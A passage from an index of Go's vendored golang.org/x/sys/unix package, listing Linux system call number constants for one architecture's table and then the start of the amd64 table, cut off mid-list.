(line 386) | SYS_PKEY_ALLOC = 381 constant SYS_PKEY_FREE (line 387) | SYS_PKEY_FREE = 382 constant SYS_STATX (line 388) | SYS_STATX = 383 constant SYS_ARCH_PRCTL (line 389) | SYS_ARCH_PRCTL = 384 constant SYS_IO_PGETEVENTS (line 390) | SYS_IO_PGETEVENTS = 385 constant SYS_RSEQ (line 391) | SYS_RSEQ = 386 constant SYS_SEMGET (line 392) | SYS_SEMGET = 393 constant SYS_SEMCTL (line 393) | SYS_SEMCTL = 394 constant SYS_SHMGET (line 394) | SYS_SHMGET = 395 constant SYS_SHMCTL (line 395) | SYS_SHMCTL = 396 constant SYS_SHMAT (line 396) | SYS_SHMAT = 397 constant SYS_SHMDT (line 397) | SYS_SHMDT = 398 constant SYS_MSGGET (line 398) | SYS_MSGGET = 399 constant SYS_MSGSND (line 399) | SYS_MSGSND = 400 constant SYS_MSGRCV (line 400) | SYS_MSGRCV = 401 constant SYS_MSGCTL (line 401) | SYS_MSGCTL = 402 constant SYS_CLOCK_GETTIME64 (line 402) | SYS_CLOCK_GETTIME64 = 403 constant SYS_CLOCK_SETTIME64 (line 403) | SYS_CLOCK_SETTIME64 = 404 constant SYS_CLOCK_ADJTIME64 (line 404) | SYS_CLOCK_ADJTIME64 = 405 constant SYS_CLOCK_GETRES_TIME64 (line 405) | SYS_CLOCK_GETRES_TIME64 = 406 constant SYS_CLOCK_NANOSLEEP_TIME64 (line 406) | SYS_CLOCK_NANOSLEEP_TIME64 = 407 constant SYS_TIMER_GETTIME64 (line 407) | SYS_TIMER_GETTIME64 = 408 constant SYS_TIMER_SETTIME64 (line 408) | SYS_TIMER_SETTIME64 = 409 constant SYS_TIMERFD_GETTIME64 (line 409) | SYS_TIMERFD_GETTIME64 = 410 constant SYS_TIMERFD_SETTIME64 (line 410) | SYS_TIMERFD_SETTIME64 = 411 constant SYS_UTIMENSAT_TIME64 (line 411) | SYS_UTIMENSAT_TIME64 = 412 constant SYS_PSELECT6_TIME64 (line 412) | SYS_PSELECT6_TIME64 = 413 constant SYS_PPOLL_TIME64 (line 413) | SYS_PPOLL_TIME64 = 414 constant SYS_IO_PGETEVENTS_TIME64 (line 414) | SYS_IO_PGETEVENTS_TIME64 = 416 constant SYS_RECVMMSG_TIME64 (line 415) | SYS_RECVMMSG_TIME64 = 417 constant SYS_MQ_TIMEDSEND_TIME64 (line 416) | SYS_MQ_TIMEDSEND_TIME64 = 418 constant SYS_MQ_TIMEDRECEIVE_TIME64 (line 417) | SYS_MQ_TIMEDRECEIVE_TIME64 = 419 constant SYS_SEMTIMEDOP_TIME64 (line 418) | SYS_SEMTIMEDOP_TIME64 = 420 constant SYS_RT_SIGTIMEDWAIT_TIME64 (line 419) | SYS_RT_SIGTIMEDWAIT_TIME64 = 421 constant SYS_FUTEX_TIME64 (line 420) | SYS_FUTEX_TIME64 = 422 constant SYS_SCHED_RR_GET_INTERVAL_TIME64 (line 421) | SYS_SCHED_RR_GET_INTERVAL_TIME64 = 423 constant SYS_PIDFD_SEND_SIGNAL (line 422) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 423) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 424) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 425) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 426) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 427) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 428) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 429) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 430) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 431) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 432) | SYS_PIDFD_OPEN = 434 constant SYS_CLONE3 (line 433) | SYS_CLONE3 = 435 constant SYS_CLOSE_RANGE (line 434) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 435) | SYS_OPENAT2 = 437 constant SYS_PIDFD_GETFD (line 436) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 437) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 438) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 439) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 440) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 441) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 442) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 443) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 444) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_MEMFD_SECRET (line 445) | SYS_MEMFD_SECRET = 447 constant SYS_PROCESS_MRELEASE (line 446) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 447) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 448) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 449) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 (line 450) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 451) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 452) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 453) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 454) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_amd64.go constant SYS_READ (line 9) | SYS_READ = 0 constant SYS_WRITE (line 10) | SYS_WRITE = 1 constant SYS_OPEN (line 11) | SYS_OPEN = 2 constant SYS_CLOSE (line 12) | SYS_CLOSE = 3 constant SYS_STAT (line 13) | SYS_STAT = 4 constant SYS_FSTAT (line 14) | SYS_FSTAT = 5 constant SYS_LSTAT (line 15) | SYS_LSTAT = 6 constant SYS_POLL (line 16) | SYS_POLL = 7 constant SYS_LSEEK (line 17) | SYS_LSEEK = 8 constant SYS_MMAP (line 18) | SYS_MMAP = 9 constant SYS_MPROTECT (line 19) | SYS_MPROTECT = 10 constant SYS_MUNMAP (line 20) | SYS_MUNMAP = 11 constant SYS_BRK (line 21) | SYS_BRK = 12 constant SYS_RT_SIGACTION (line 22) | SYS_RT_SIGACTION = 13 constant SYS_RT_SIGPROCMASK (line 23) | SYS_RT_SIGPROCMASK = 14 constant SYS_RT_SIGRETURN (line 24) | SYS_RT_SIGRETURN = 15 constant SYS_IOCTL (line 25) | SYS_IOCTL = 16 constant SYS_PREAD64 (line 26) | SYS_PREAD64 = 17 constant SYS_PWRITE64 (line 27) | SYS_PWRITE64 = 18 constant SYS_READV (line 28) | SYS_READV = 19 constant SYS_WRITEV (line 29) | SYS_WRITEV = 20 constant SYS_ACCESS (line 30) | SYS_ACCESS = 21 constant SYS_PIPE (line 31) | SYS_PIPE = 22 constant SYS_SELECT (line 32) | SYS_SELECT = 23 constant SYS_SCHED_YIELD (line 33) | SYS_SCHED_YIELD = 24 constant SYS_MREMAP (line 34) | SYS_MREMAP = 25 constant SYS_MSYNC (line 35) | SYS_MSYNC = 26 constant SYS_MINCORE (line 36) | SYS_MINCORE = 27 constant SYS_MADVISE (line 37) | SYS_MADVISE = 28 constant SYS_SHMGET (line 38) | SYS_SHMGET = 29 constant SYS_SHMAT (line 39) | SYS_SHMAT = 30 constant SYS_SHMCTL (line 40) | SYS_SHMCTL = 31 constant SYS_DUP (line 41) | SYS_DUP = 32 constant SYS_DUP2 (line 42) | SYS_DUP2 = 33 constant SYS_PAUSE (line 43) | SYS_PAUSE = 34 constant SYS_NANOSLEEP (line 44) | SYS_NANOSLEEP = 35 constant SYS_GETITIMER (line 45) | SYS_GETITIMER = 36 constant SYS_ALARM (line 46) | SYS_ALARM = 37 constant SYS_SETITIMER (line 47) | SYS_SETITIMER = 38 constant SYS_GETPID (line 48) | SYS_GETPID = 39 constant SYS_SENDFILE (line 49) | SYS_SENDFILE = 40 constant SYS_SOCKET (line 50) | SYS_SOCKET = 41 constant SYS_CONNECT (line 51) | SYS_CONNECT = 42 constant SYS_ACCEPT (line 52) | SYS_ACCEPT = 43 constant SYS_SENDTO (line 53) | SYS_SENDTO = 44 constant SYS_RECVFROM (line 54) | SYS_RECVFROM = 45 constant SYS_SENDMSG (line 55) | SYS_SENDMSG = 46 constant SYS_RECVMSG (line 56) | SYS_RECVMSG = 47 constant SYS_SHUTDOWN (line 57) | SYS_SHUTDOWN = 48 constant SYS_BIND (line 58) | SYS_BIND = 49 constant SYS_LISTEN (line 59) | SYS_LISTEN = 50 constant SYS_GETSOCKNAME (line 60) | SYS_GETSOCKNAME = 51 constant SYS_GETPEERNAME (line 61) | SYS_GETPEERNAME = 52 constant SYS_SOCKETPAIR (line 62) | SYS_SOCKETPAIR = 53 constant SYS_SETSOCKOPT (line 63) | SYS_SETSOCKOPT = 54 constant SYS_GETSOCKOPT (line 64) | SYS_GETSOCKOPT = 55 constant SYS_CLONE (line 65) | SYS_CLONE = 56 constant SYS_FORK (line 66) | SYS_FORK = 57 constant SYS_VFORK (line 67) | SYS_VFORK = 58 constant SYS_EXECVE (line 68) | SYS_EXECVE = 59 constant SYS_EXIT (line 69) | SYS_EXIT = 60 constant SYS_WAIT4 (line 70) | SYS_WAIT4 = 61 constant SYS_KILL (line 71) | SYS_KILL = 62 constant SYS_UNAME (line 72) | SYS_UNAME = 63 constant SYS_SEMGET (line 73) | SYS_SEMGET = 64 constant SYS_SEMOP (line 74) | SYS_SEMOP = 65 constant SYS_SEMCTL (line 75) | SYS_SEMCTL = 66 constant SYS_SHMDT (line 76) | SYS_SHMDT = 67 constant SYS_MSGGET (line 77) | SYS_MSGGET = 68 constant SYS_MSGSND (line 78) | SYS_MSGSND = 69 constant SYS_MSGRCV (line 79) | SYS_MSGRCV = 70 constant SYS_MSGCTL (line 80) | SYS_MSGCTL = 71 constant SYS_FCNTL (line 81) | SYS_FCNTL = 72 constant SYS_FLOCK (line 82) | SYS_FLOCK = 73 constant SYS_FSYNC (line 83) | SYS_FSYNC = 74 constant SYS_FDATASYNC (line 84) | SYS_FDATASYNC = 75 constant SYS_TRUNCATE (line 85) | SYS_TRUNCATE = 76 constant SYS_FTRUNCATE (line 86) | SYS_FTRUNCATE = 77 constant SYS_GETDENTS (line 87) | SYS_GETDENTS = 78 constant SYS_GETCWD (line 88) | SYS_GETCWD = 79 constant SYS_CHDIR (line 89) | SYS_CHDIR = 80 constant SYS_FCHDIR (line 90) | SYS_FCHDIR = 81 constant SYS_RENAME (line 91) | SYS_RENAME = 82 constant SYS_MKDIR (line 92) | SYS_MKDIR = 83 constant SYS_RMDIR (line 93) | SYS_RMDIR = 84 constant SYS_CREAT (line 94) | SYS_CREAT = 85 constant SYS_LINK (line 95) | SYS_LINK = 86 constant SYS_UNLINK (line 96) | SYS_UNLINK = 87 constant SYS_SYMLINK (line 97) | SYS_SYMLINK = 88 constant SYS_READLINK (line 98) | SYS_READLINK = 89 constant SYS_CHMOD (line 99) | SYS_CHMOD = 90 constant SYS_FCHMOD (line 100) | SYS_FCHMOD = 91 constant SYS_CHOWN (line 101) | SYS_CHOWN = 92 constant SYS_FCHOWN (line 102) | SYS_FCHOWN = 93 constant SYS_LCHOWN (line 103) | SYS_LCHOWN = 94 constant SYS_UMASK (line 104) | SYS_UMASK = 95 constant SYS_GETTIMEOFDAY (line 105) | SYS_GETTIMEOFDAY = 96 constant SYS_GETRLIMIT (line 106) | SYS_GETRLIMIT = 97 constant SYS_GETRUSAGE (line 107) | SYS_GETRUSAGE = 98 constant SYS_SYSINFO (line 108) | SYS_SYSINFO = 99 constant SYS_TIMES (line 109) | SYS_TIMES = 100 constant SYS_PTRACE (line 110) | SYS_PTRACE = 101 constant SYS_GETUID (line 111) | SYS_GETUID = 102 constant SYS_SYSLOG (line 112) | SYS_SYSLOG = 103 constant SYS_GETGID (line 113) | SYS_GETGID = 104 constant SYS_SETUID (line 114) | SYS_SETUID = 105 constant SYS_SETGID (line 115) | SYS_SETGID = 106 constant SYS_GETEUID (line 116) | SYS_GETEUID = 107 constant SYS_GETEGID (line 117) | SYS_GETEGID = 108 constant SYS_SETPGID (line 118) | SYS_SETPGID = 109 constant SYS_GETPPID (line 119) | SYS_GETPPID = 110 constant SYS_GETPGRP (line 120) | SYS_GETPGRP = 111 constant SYS_SETSID (line 121) | SYS_SETSID = 112 constant SYS_SETREUID (line 122) | SYS_SETREUID = 113 constant SYS_SETREGID (line 123) | SYS_SETREGID = 114 constant SYS_GETGROUPS (line 124) | SYS_GETGROUPS = 115 constant SYS_SETGROUPS (line 125) | SYS_SETGROUPS = 116 constant SYS_SETRESUID (line 126) | SYS_SETRESUID = 117 constant SYS_GETRESUID (line 127) | SYS_GETRESUID = 118 constant SYS_SETRESGID (line 128) | SYS_SETRESGID = 119 constant SYS_GETRESGID (line 129) | SYS_GETRESGID = 120 constant SYS_GETPGID (line 130) | SYS_GETPGID = 121 constant SYS_SETFSUID (line 131) | SYS_SETFSUID = 122 constant SYS_SETFSGID (line 132) | SYS_SETFSGID = 123 constant SYS_GETSID (line 133) | SYS_GETSID = 124 constant SYS_CAPGET (line 134) | SYS_CAPGET = 125 constant SYS_CAPSET (line 135) | SYS_CAPSET = 126 constant SYS_RT_SIGPENDING (line 136) | SYS_RT_SIGPENDING = 127 constant SYS_RT_SIGTIMEDWAIT (line 137) | SYS_RT_SIGTIMEDWAIT = 128 constant SYS_RT_SIGQUEUEINFO (line 138) | SYS_RT_SIGQUEUEINFO = 129 constant SYS_RT_SIGSUSPEND (line 139) | SYS_RT_SIGSUSPEND = 130 constant SYS_SIGALTSTACK (line 140) | SYS_SIGALTSTACK = 131 constant SYS_UTIME (line 141) | SYS_UTIME = 132 constant SYS_MKNOD (line 142) | SYS_MKNOD = 133 constant SYS_USELIB (line 143) | SYS_USELIB = 134 constant SYS_PERSONALITY (line 144) | SYS_PERSONALITY = 135 constant SYS_USTAT (line 145) | SYS_USTAT = 136 constant SYS_STATFS (line 146) | SYS_STATFS = 137 constant SYS_FSTATFS (line 147) | SYS_FSTATFS = 138 constant SYS_SYSFS (line 148) | SYS_SYSFS = 139 constant SYS_GETPRIORITY (line 149) | SYS_GETPRIORITY = 140 constant SYS_SETPRIORITY (line 150) | SYS_SETPRIORITY = 141 constant SYS_SCHED_SETPARAM (line 151) | SYS_SCHED_SETPARAM = 142 constant SYS_SCHED_GETPARAM (line 152) | SYS_SCHED_GETPARAM = 143 constant SYS_SCHED_SETSCHEDULER (line 153) | SYS_SCHED_SETSCHEDULER = 144 constant SYS_SCHED_GETSCHEDULER (line 154) | SYS_SCHED_GETSCHEDULER = 145 constant SYS_SCHED_GET_PRIORITY_MAX (line 155) | SYS_SCHED_GET_PRIORITY_MAX = 146 constant SYS_SCHED_GET_PRIORITY_MIN (line 156) | SYS_SCHED_GET_PRIORITY_MIN = 147 constant SYS_SCHED_RR_GET_INTERVAL (line 157) | SYS_SCHED_RR_GET_INTERVAL = 148 constant SYS_MLOCK (line 158) | SYS_MLOCK = 149 constant SYS_MUNLOCK (line 159) | SYS_MUNLOCK = 150 constant SYS_MLOCKALL (line 160) | SYS_MLOCKALL = 151 constant SYS_MUNLOCKALL (line 161) | SYS_MUNLOCKALL = 152 constant SYS_VHANGUP (line 162) | SYS_VHANGUP = 153 constant SYS_MODIFY_LDT (line 163) | SYS_MODIFY_LDT = 154 constant SYS_PIVOT_ROOT (line 164) | SYS_PIVOT_ROOT = 155 constant SYS__SYSCTL (line 165) | SYS__SYSCTL = 156 constant SYS_PRCTL (line 166) | SYS_PRCTL = 157 constant SYS_ARCH_PRCTL (line 167) | SYS_ARCH_PRCTL = 158 constant SYS_ADJTIMEX (line 168) | SYS_ADJTIMEX = 159 constant SYS_SETRLIMIT (line 169) | SYS_SETRLIMIT = 160 constant SYS_CHROOT (line 170) | SYS_CHROOT = 161 constant SYS_SYNC (line 171) | SYS_SYNC = 162 constant SYS_ACCT (line 172) | SYS_ACCT = 163 constant SYS_SETTIMEOFDAY (line 173) | SYS_SETTIMEOFDAY = 164 constant SYS_MOUNT (line 174) | SYS_MOUNT = 165 constant SYS_UMOUNT2 (line 175) | SYS_UMOUNT2 = 166 constant SYS_SWAPON (line 176) | SYS_SWAPON = 167 constant SYS_SWAPOFF (line 177) | SYS_SWAPOFF = 168 constant SYS_REBOOT (line 178) | SYS_REBOOT = 169 constant SYS_SETHOSTNAME (line 179) | SYS_SETHOSTNAME = 170 constant SYS_SETDOMAINNAME (line 180) | SYS_SETDOMAINNAME = 171 constant SYS_IOPL (line 181) | SYS_IOPL = 172 constant SYS_IOPERM (line 182) | SYS_IOPERM = 173 constant SYS_CREATE_MODULE (line 183) | SYS_CREATE_MODULE = 174 constant SYS_INIT_MODULE (line 184) | SYS_INIT_MODULE = 175 constant SYS_DELETE_MODULE (line 185) | SYS_DELETE_MODULE = 176 constant SYS_GET_KERNEL_SYMS (line 186) | SYS_GET_KERNEL_SYMS = 177 constant SYS_QUERY_MODULE (line 187) | SYS_QUERY_MODULE = 178 constant SYS_QUOTACTL (line 188) | SYS_QUOTACTL = 179 constant SYS_NFSSERVCTL (line 189) | SYS_NFSSERVCTL = 180 constant SYS_GETPMSG (line 190) | SYS_GETPMSG = 181 constant SYS_PUTPMSG (line 191) | SYS_PUTPMSG = 182 constant SYS_AFS_SYSCALL (line 192) | SYS_AFS_SYSCALL = 183 constant SYS_TUXCALL (line 193) | SYS_TUXCALL = 184 constant SYS_SECURITY (line 194) | SYS_SECURITY = 185 constant SYS_GETTID (line 195) | SYS_GETTID = 186 constant SYS_READAHEAD (line 196) | SYS_READAHEAD = 187 constant SYS_SETXATTR (line 197) | SYS_SETXATTR = 188 constant SYS_LSETXATTR (line 198) | SYS_LSETXATTR = 189 constant SYS_FSETXATTR (line 199) | SYS_FSETXATTR = 190 constant SYS_GETXATTR (line 200) | SYS_GETXATTR = 191 constant SYS_LGETXATTR (line 201) | SYS_LGETXATTR = 192 constant SYS_FGETXATTR (line 202) | SYS_FGETXATTR = 193 constant SYS_LISTXATTR (line 203) | SYS_LISTXATTR = 194 constant SYS_LLISTXATTR (line 204) | SYS_LLISTXATTR = 195 constant SYS_FLISTXATTR (line 205) | SYS_FLISTXATTR = 196 constant SYS_REMOVEXATTR (line 206) | SYS_REMOVEXATTR = 197 constant SYS_LREMOVEXATTR (line 207) | SYS_LREMOVEXATTR = 198 constant SYS_FREMOVEXATTR (line 208) | SYS_FREMOVEXATTR = 199 constant SYS_TKILL (line 209) | SYS_TKILL = 200 constant SYS_TIME (line 210) | SYS_TIME = 201 constant SYS_FUTEX (line 211) | SYS_FUTEX = 202 constant SYS_SCHED_SETAFFINITY (line 212) | SYS_SCHED_SETAFFINITY = 203 constant SYS_SCHED_GETAFFINITY (line 213) | SYS_SCHED_GETAFFINITY = 204 constant SYS_SET_THREAD_AREA (line 214) | SYS_SET_THREAD_AREA = 205 constant SYS_IO_SETUP (line 215) | SYS_IO_SETUP = 206 constant SYS_IO_DESTROY (line 216) | SYS_IO_DESTROY = 207 constant SYS_IO_GETEVENTS (line 217) | SYS_IO_GETEVENTS = 208 constant SYS_IO_SUBMIT (line 218) | SYS_IO_SUBMIT = 209 constant SYS_IO_CANCEL (line 219) | SYS_IO_CANCEL = 210 constant SYS_GET_THREAD_AREA (line 220) | SYS_GET_THREAD_AREA = 211 constant SYS_LOOKUP_DCOOKIE (line 221) | SYS_LOOKUP_DCOOKIE = 212 constant SYS_EPOLL_CREATE (line 222) | SYS_EPOLL_CREATE = 213 constant SYS_EPOLL_CTL_OLD (line 223) | SYS_EPOLL_CTL_OLD = 214 constant SYS_EPOLL_WAIT_OLD (line 224) | SYS_EPOLL_WAIT_OLD = 215 constant SYS_REMAP_FILE_PAGES (line 225) | SYS_REMAP_FILE_PAGES = 216 constant SYS_GETDENTS64 (line 226) | SYS_GETDENTS64 = 217 constant SYS_SET_TID_ADDRESS (line 227) | SYS_SET_TID_ADDRESS = 218 constant SYS_RESTART_SYSCALL (line 228) | SYS_RESTART_SYSCALL = 219 constant SYS_SEMTIMEDOP (line 229) | SYS_SEMTIMEDOP = 220 constant SYS_FADVISE64 (line 230) | SYS_FADVISE64 = 221 constant SYS_TIMER_CREATE (line 231) | SYS_TIMER_CREATE = 222 constant SYS_TIMER_SETTIME (line 232) | SYS_TIMER_SETTIME = 223 constant SYS_TIMER_GETTIME (line 233) | SYS_TIMER_GETTIME = 224 constant SYS_TIMER_GETOVERRUN (line 234) | SYS_TIMER_GETOVERRUN = 225 constant SYS_TIMER_DELETE (line 235) | SYS_TIMER_DELETE = 226 constant SYS_CLOCK_SETTIME (line 236) | SYS_CLOCK_SETTIME = 227 constant SYS_CLOCK_GETTIME (line 237) | SYS_CLOCK_GETTIME = 228 constant SYS_CLOCK_GETRES (line 238) | SYS_CLOCK_GETRES = 229 constant SYS_CLOCK_NANOSLEEP (line 239) | SYS_CLOCK_NANOSLEEP = 230 constant SYS_EXIT_GROUP (line 240) | SYS_EXIT_GROUP = 231 constant SYS_EPOLL_WAIT (line 241) | SYS_EPOLL_WAIT = 232 constant SYS_EPOLL_CTL (line 242) | SYS_EPOLL_CTL = 233 constant SYS_TGKILL (line 243) | SYS_TGKILL = 234 constant SYS_UTIMES (line 244) | SYS_UTIMES = 235 constant SYS_VSERVER (line 245) | SYS_VSERVER = 236 constant SYS_MBIND (line 246) | SYS_MBIND = 237 constant SYS_SET_MEMPOLICY (line 247) | SYS_SET_MEMPOLICY = 238 constant SYS_GET_MEMPOLICY (line 248) | SYS_GET_MEMPOLICY = 239 constant SYS_MQ_OPEN (line 249) | SYS_MQ_OPEN = 240 constant SYS_MQ_UNLINK (line 250) | SYS_MQ_UNLINK = 241 constant SYS_MQ_TIMEDSEND (line 251) | SYS_MQ_TIMEDSEND = 242 constant SYS_MQ_TIMEDRECEIVE (line 252) | SYS_MQ_TIMEDRECEIVE = 243 constant SYS_MQ_NOTIFY (line 253) | SYS_MQ_NOTIFY = 244 constant SYS_MQ_GETSETATTR (line 254) | SYS_MQ_GETSETATTR = 245 constant SYS_KEXEC_LOAD (line 255) | SYS_KEXEC_LOAD = 246 constant SYS_WAITID (line 256) | SYS_WAITID = 247 constant SYS_ADD_KEY (line 257) | SYS_ADD_KEY = 248 constant SYS_REQUEST_KEY (line 258) | SYS_REQUEST_KEY = 249 constant SYS_KEYCTL (line 259) | SYS_KEYCTL = 250 constant SYS_IOPRIO_SET (line 260) | SYS_IOPRIO_SET = 251 constant SYS_IOPRIO_GET (line 261) | SYS_IOPRIO_GET = 252 constant SYS_INOTIFY_INIT (line 262) | SYS_INOTIFY_INIT = 253 constant SYS_INOTIFY_ADD_WATCH (line 263) | SYS_INOTIFY_ADD_WATCH = 254 constant SYS_INOTIFY_RM_WATCH (line 264) | SYS_INOTIFY_RM_WATCH = 255 constant SYS_MIGRATE_PAGES (line 265) | SYS_MIGRATE_PAGES = 256 constant SYS_OPENAT (line 266) | SYS_OPENAT = 257 constant SYS_MKDIRAT (line 267) | SYS_MKDIRAT = 258 constant SYS_MKNODAT (line 268) | SYS_MKNODAT = 259 constant SYS_FCHOWNAT (line 269) | SYS_FCHOWNAT = 260 constant SYS_FUTIMESAT (line 270) | SYS_FUTIMESAT = 261 constant SYS_NEWFSTATAT (line 271) | SYS_NEWFSTATAT = 262 constant SYS_UNLINKAT (line 272) | SYS_UNLINKAT = 263 constant SYS_RENAMEAT (line 273) | SYS_RENAMEAT = 264 constant SYS_LINKAT (line 274) | SYS_LINKAT = 265 constant SYS_SYMLINKAT (line 275) | SYS_SYMLINKAT = 266 constant SYS_READLINKAT (line 276) | SYS_READLINKAT = 267 constant SYS_FCHMODAT (line 277) | SYS_FCHMODAT = 268 constant SYS_FACCESSAT (line 278) | SYS_FACCESSAT = 269 constant SYS_PSELECT6 (line 279) | SYS_PSELECT6 = 270 constant SYS_PPOLL (line 280) | SYS_PPOLL = 271 constant SYS_UNSHARE (line 281) | SYS_UNSHARE = 272 constant SYS_SET_ROBUST_LIST (line 282) | SYS_SET_ROBUST_LIST = 273 constant SYS_GET_ROBUST_LIST (line 283) | SYS_GET_ROBUST_LIST = 274 constant SYS_SPLICE (line 284) | SYS_SPLICE = 275 constant SYS_TEE (line 285) | SYS_TEE = 276 constant SYS_SYNC_FILE_RANGE (line 286) | SYS_SYNC_FILE_RANGE = 277 constant SYS_VMSPLICE (line 287) | SYS_VMSPLICE = 278 constant SYS_MOVE_PAGES (line 288) | SYS_MOVE_PAGES = 279 constant SYS_UTIMENSAT (line 289) | SYS_UTIMENSAT = 280 constant SYS_EPOLL_PWAIT (line 290) | SYS_EPOLL_PWAIT = 281 constant SYS_SIGNALFD (line 291) | SYS_SIGNALFD = 282 constant SYS_TIMERFD_CREATE (line 292) | SYS_TIMERFD_CREATE = 283 constant SYS_EVENTFD (line 293) | SYS_EVENTFD = 284 constant SYS_FALLOCATE (line 294) | SYS_FALLOCATE = 285 constant SYS_TIMERFD_SETTIME (line 295) | SYS_TIMERFD_SETTIME = 286 constant SYS_TIMERFD_GETTIME (line 296) | SYS_TIMERFD_GETTIME = 287 constant SYS_ACCEPT4 (line 297) | SYS_ACCEPT4 = 288 constant SYS_SIGNALFD4 (line 298) | SYS_SIGNALFD4 = 289 constant SYS_EVENTFD2 (line 299) | SYS_EVENTFD2 = 290 constant SYS_EPOLL_CREATE1 (line 300) | SYS_EPOLL_CREATE1 = 291 constant SYS_DUP3 (line 301) | SYS_DUP3 = 292 constant SYS_PIPE2 (line 302) | SYS_PIPE2 = 293 constant SYS_INOTIFY_INIT1 (line 303) | SYS_INOTIFY_INIT1 = 294 constant SYS_PREADV (line 304) | SYS_PREADV = 295 constant SYS_PWRITEV (line 305) | SYS_PWRITEV = 296 constant SYS_RT_TGSIGQUEUEINFO (line 306) | SYS_RT_TGSIGQUEUEINFO = 297 constant SYS_PERF_EVENT_OPEN (line 307) | SYS_PERF_EVENT_OPEN = 298 constant SYS_RECVMMSG (line 308) | SYS_RECVMMSG = 299 constant SYS_FANOTIFY_INIT (line 309) | SYS_FANOTIFY_INIT = 300 constant SYS_FANOTIFY_MARK (line 310) | SYS_FANOTIFY_MARK = 301 constant SYS_PRLIMIT64 (line 311) | SYS_PRLIMIT64 = 302 constant SYS_NAME_TO_HANDLE_AT (line 312) | SYS_NAME_TO_HANDLE_AT = 303 constant SYS_OPEN_BY_HANDLE_AT (line 313) | SYS_OPEN_BY_HANDLE_AT = 304 constant SYS_CLOCK_ADJTIME (line 314) | SYS_CLOCK_ADJTIME = 305 constant SYS_SYNCFS (line 315) | SYS_SYNCFS = 306 constant SYS_SENDMMSG (line 316) | SYS_SENDMMSG = 307 constant SYS_SETNS (line 317) | SYS_SETNS = 308 constant SYS_GETCPU (line 318) | SYS_GETCPU = 309 constant SYS_PROCESS_VM_READV (line 319) | SYS_PROCESS_VM_READV = 310 constant SYS_PROCESS_VM_WRITEV (line 320) | SYS_PROCESS_VM_WRITEV = 311 constant SYS_KCMP (line 321) | SYS_KCMP = 312 constant SYS_FINIT_MODULE (line 322) | SYS_FINIT_MODULE = 313 constant SYS_SCHED_SETATTR (line 323) | SYS_SCHED_SETATTR = 314 constant SYS_SCHED_GETATTR (line 324) | SYS_SCHED_GETATTR = 315 constant SYS_RENAMEAT2 (line 325) | SYS_RENAMEAT2 = 316 constant SYS_SECCOMP (line 326) | SYS_SECCOMP = 317 constant SYS_GETRANDOM (line 327) | SYS_GETRANDOM = 318 constant SYS_MEMFD_CREATE (line 328) | SYS_MEMFD_CREATE = 319 constant SYS_KEXEC_FILE_LOAD (line 329) | SYS_KEXEC_FILE_LOAD = 320 constant SYS_BPF (line 330) | SYS_BPF = 321 constant SYS_EXECVEAT (line 331) | SYS_EXECVEAT = 322 constant SYS_USERFAULTFD (line 332) | SYS_USERFAULTFD = 323 constant SYS_MEMBARRIER (line 333) | SYS_MEMBARRIER = 324 constant SYS_MLOCK2 (line 334) | SYS_MLOCK2 = 325 constant SYS_COPY_FILE_RANGE (line 335) | SYS_COPY_FILE_RANGE = 326 constant SYS_PREADV2 (line 336) | SYS_PREADV2 = 327 constant SYS_PWRITEV2 (line 337) | SYS_PWRITEV2 = 328 constant SYS_PKEY_MPROTECT (line 338) | SYS_PKEY_MPROTECT = 329 constant SYS_PKEY_ALLOC (line 339) | SYS_PKEY_ALLOC = 330 constant SYS_PKEY_FREE (line 340) | SYS_PKEY_FREE = 331 constant SYS_STATX (line 341) | SYS_STATX = 332 constant SYS_IO_PGETEVENTS (line 342) | SYS_IO_PGETEVENTS = 333 constant SYS_RSEQ (line 343) | SYS_RSEQ = 334 constant SYS_PIDFD_SEND_SIGNAL (line 344) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 345) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 346) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 347) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 348) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 349) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 350) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 351) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 352) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 353) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 354) | SYS_PIDFD_OPEN = 